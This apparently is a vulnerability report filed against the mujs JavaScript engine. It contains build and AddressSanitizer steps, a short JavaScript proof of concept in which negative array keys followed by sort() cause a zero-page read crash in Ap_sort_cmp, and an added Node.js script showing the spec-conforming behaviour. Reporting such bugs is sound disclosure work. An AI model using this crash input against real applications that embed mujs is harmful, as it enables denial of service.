Open
Description
We found a potential vulnerability in the latest version of mujs.
Environment
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ gcc --version
gcc (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0
Copyright (C) 2023 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ cat /etc/os-release
PRETTY_NAME="Ubuntu 24.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.2 LTS (Noble Numbat)"
VERSION_CODENAME=noble
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=noble
LOGO=ubuntu-logo
Reproduction
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ git clone https://github.com/ccxvii/mujs.git ~/FuzzDriverGen/findreal/mujs
Cloning into '/home/zhicheng/FuzzDriverGen/findreal/mujs'...
remote: Enumerating objects: 3587, done.
remote: Counting objects: 100% (707/707), done.
remote: Compressing objects: 100% (182/182), done.
remote: Total 3587 (delta 570), reused 529 (delta 525), pack-reused 2880 (from 3)
Receiving objects: 100% (3587/3587), 1.06 MiB | 738.00 KiB/s, done.
Resolving deltas: 100% (2649/2649), done.
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal$ cd ~/FuzzDriverGen/findreal/mujs
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ git rev-parse HEAD
05cd646bad083ed45e9e1c9846ea671d461ced30
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ sed -i 's/CFLAGS = -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter/CFLAGS = -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address/' Makefile
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ make
curl -s -o UnicodeData.txt https://www.unicode.org/Public/16.0.0/ucd/UnicodeData.txt
curl -s -o SpecialCasing.txt https://www.unicode.org/Public/16.0.0/ucd/SpecialCasing.txt
python3 genucd.py UnicodeData.txt SpecialCasing.txt >utfdata.h
cc -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address -g -c -o build/debug/libmujs.o one.c
cc -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address -g -o build/debug/mujs main.c build/debug/libmujs.o -lm -DHAVE_READLINE -lreadline
cc -std=c99 -pedantic -Wall -Wextra -Wno-unused-parameter -fsanitize=address -g -o build/debug/mujs-pp pp.c build/debug/libmujs.o -lm
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ cat << EOF > poc
var crash = new Array(3);
[-7, -42, -31337].forEach(function (idx) {
crash[idx] = idx * 2 + 1;
});
crash.sort();
EOF
zhicheng@LAPTOP-DQ41SBH2:~/FuzzDriverGen/findreal/mujs$ ./build/debug/mujs poc
AddressSanitizer:DEADLYSIGNAL
=================================================================
==23738==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000002f (pc 0x5f0245384fe8 bp 0x7ffd00e23e60 sp 0x7ffd00e23de0 T0)
==23738==The signal is caused by a READ memory access.
==23738==Hint: address points to the zero page.
#0 0x5f0245384fe8 in Ap_sort_cmp /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:246
#1 0x5f02453858c9 in Ap_sort_leaf /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:357
#2 0x5f0245385936 in Ap_sort_sift /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:371
#3 0x5f02453859c6 in Ap_sort_heapsort /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:384
#4 0x5f0245385ad5 in Ap_sort /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:407
#5 0x5f02453cae1a in jsR_callcfunction /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1249
#6 0x5f02453cb931 in js_call /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1299
#7 0x5f02453d04a1 in jsR_run /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1810
#8 0x5f02453cab67 in jsR_callscript /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1230
#9 0x5f02453cb7e6 in js_call /home/zhicheng/FuzzDriverGen/findreal/mujs/jsrun.c:1295
#10 0x5f02453d2fe6 in js_dofile /home/zhicheng/FuzzDriverGen/findreal/mujs/jsstate.c:249
#11 0x5f0245384144 in main /home/zhicheng/FuzzDriverGen/findreal/mujs/main.c:363
#12 0x7ecd5942a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
#13 0x7ecd5942a28a in __libc_start_main_impl ../csu/libc-start.c:360
#14 0x5f0245382b24 in _start (/home/zhicheng/FuzzDriverGen/findreal/mujs/build/debug/mujs+0x12b24) (BuildId: 151666f3e93596a8651c122b73d85c3ac6691864)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/zhicheng/FuzzDriverGen/findreal/mujs/jsarray.c:246 in Ap_sort_cmp
==23738==ABORTING
PoC
var crash = new Array(3);
[-7, -42, -31337].forEach(function (idx) {
crash[idx] = idx * 2 + 1;
});
crash.sort();
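For triage, the following is an added example written for this page; it is not code from the issue or from mujs, and it does not run mujs. It executes the same PoC in a spec-conforming engine (assumed: Node.js) and instruments it to show what ECMAScript requires at the point where mujs crashes: negative numeric keys are not array indices (an array index is a canonical numeric string in [0, 2^32 - 2]), so the three assignments create ordinary own properties, `length` stays 3, and `Array.prototype.sort` must only visit indices 0..length-1, never the "-7", "-42", "-31337" properties. The issue does not identify the root cause in `Ap_sort_cmp`; this shows only the behaviour a correct engine exhibits on the same input. The helper names (`buildPoc`, `describe`, `isArrayIndex`, `sortAndCheck`) are this example's own.

```javascript
'use strict';

// Added example (not from the issue or from mujs): the PoC above, run in a
// spec-conforming engine, with the array state made visible around sort().
function buildPoc() {
  const crash = new Array(3);            // length 3, three holes, no elements
  [-7, -42, -31337].forEach(function (idx) {
    crash[idx] = idx * 2 + 1;            // creates own properties "-7", "-42", "-31337"
  });                                    // length is still 3
  return crash;
}

// ECMAScript array-index test: a canonical numeric string whose value is
// below 2^32 - 1. Negative keys and non-canonical forms ("01") fail it.
function isArrayIndex(key) {
  const n = Number(key);
  return String(n >>> 0) === key && n < 4294967295;
}

// Summarise what sort() is allowed to look at: index keys are elements,
// every other own key is a plain property that sort() must leave alone.
function describe(arr) {
  const keys = Object.keys(arr);         // holes are not own properties
  const indexKeys = keys.filter(isArrayIndex);
  const nonIndexKeys = keys.filter(function (k) { return !isArrayIndex(k); });
  return {
    length: arr.length,
    elementCount: indexKeys.length,      // elements sort() may compare
    holes: arr.length - indexKeys.length,
    nonIndexKeys: nonIndexKeys,          // properties sort() must ignore
  };
}

// Run sort() on the PoC array and report that nothing outside [0, length)
// was touched: the negative-keyed properties and their values survive.
function sortAndCheck() {
  const crash = buildPoc();
  const before = describe(crash);
  crash.sort();                          // in mujs this is where Ap_sort_cmp faults
  const after = describe(crash);
  return {
    before: before,
    after: after,
    propertiesPreserved: before.nonIndexKeys.join() === after.nonIndexKeys.join(),
    valueAtMinus7: crash[-7],            // -7 * 2 + 1 = -13, untouched by sort()
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(sortAndCheck(), null, 2));
}
```

Running it prints a length of 3, zero elements, three holes, and the three negative keys unchanged after `sort()`. When comparing against mujs, the useful observation is that the comparator is being invoked on an array whose only own properties are non-index keys; the crash in `Ap_sort_cmp` at `jsarray.c:246` happens while reading through address 0x2f, which the sanitizer flags as a zero-page read, so the first thing to inspect in the engine is what `Ap_sort_cmp` dereferences when the slots in [0, length) hold no element.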